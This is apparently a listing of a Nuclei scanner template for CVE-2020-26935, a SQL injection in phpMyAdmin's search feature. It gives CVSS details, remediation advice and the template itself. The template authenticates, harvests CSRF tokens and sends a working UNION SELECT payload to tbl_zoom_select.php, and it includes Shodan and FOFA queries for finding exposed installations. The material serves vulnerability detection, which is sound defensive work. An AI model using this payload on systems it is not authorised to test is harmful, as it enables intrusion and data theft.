phpMyAdmin < 5.0.3 - SQL Injection
CVE-2020-26935
Verified
Description
phpMyAdmin before 4.9.6 and 5.x before 5.0.3 contains a SQL injection caused by improper processing of SQL statements in the search feature, letting attackers inject malicious SQL, exploit requires crafted search input.
Severity
Critical
CVSS Score
9.8
Exploit Probability
67%
Published Date
January 21, 2026
Template Author
0x_akoko
CVE-2020-26935.yaml
id: CVE-2020-26935
info:
name: phpMyAdmin < 5.0.3 - SQL Injection
author: 0x_Akoko
severity: critical
description: |
phpMyAdmin before 4.9.6 and 5.x before 5.0.3 contains a SQL injection caused by improper processing of SQL statements in the search feature, letting attackers inject malicious SQL, exploit requires crafted search input.
impact: |
Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
remediation: |
Update to phpMyAdmin 4.9.6 or 5.0.3, or latest version.
reference:
- https://www.phpmyadmin.net/security/PMASA-2020-6/
- https://github.com/phpmyadmin/phpmyadmin/commit/d09ab9bc9d634ad08b866d42bb8c4109869d38d2
- https://nvd.nist.gov/vuln/detail/CVE-2020-26935
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-26935
epss-score: 0.66545
epss-percentile: 0.99188
cwe-id: CWE-89
metadata:
verified: true
max-request: 4
shodan-query: http.title:"phpMyAdmin"
fofa-query: app="phpMyAdmin"
tags: cve,cve2020,phpmyadmin,sqli,authenticated
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains_all(body, "phpMyAdmin", "name=\"token\"")
condition: and
internal: true
extractors:
- type: regex
name: token
part: body
group: 1
regex:
- 'name="token" value="([^"]+)"'
internal: true
- type: regex
name: set_session
part: body
group: 1
regex:
- 'name="set_session" value="([^"]+)"'
internal: true
- raw:
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
pma_username={{username}}&pma_password={{password}}&server=1&target=index.php&token={{token}}&set_session={{set_session}}
matchers:
- type: dsl
dsl:
- status_code == 302
- contains(header, "pmaAuth-1=")
condition: and
internal: true
- raw:
- |
GET /index.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, "logged_in:true")
condition: and
internal: true
extractors:
- type: regex
name: token2
part: body
group: 1
regex:
- 'token:"([^"]+)"'
internal: true
- raw:
- |
POST /tbl_zoom_select.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
db=testdb&table=users&where_clause=1=0 UNION SELECT 1,CONCAT(USER(),0x3a,DATABASE(),0x3a,VERSION()),3-- -&where_clause_sign=&token={{token2}}&ajax_request=true&get_data_row=true
matchers:
- type: dsl
dsl:
- status_code == 200
- contains_all(body, "\"success\":true", "\"row_info\"")
condition: and
extractors:
- type: regex
name: sqli_data
part: body
group: 1
regex:
- '"username":"([^"]+)"'
# digest: 4b0a00483046022100a58810d2b29662a35138f360d58414e732ebf73e504e92fc6e2b5d9244af4a86022100f31c97a9364ba0dcdadc7dcf189f2a7fe65d5fa6514f5cf73525a264a60830ab:922c64590222798bb761d5b6d8e729509.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2020-26935
CWE ID:
cwe-89
Remediation Steps
Update to phpMyAdmin 4.9.6 or 5.0.3, or latest version.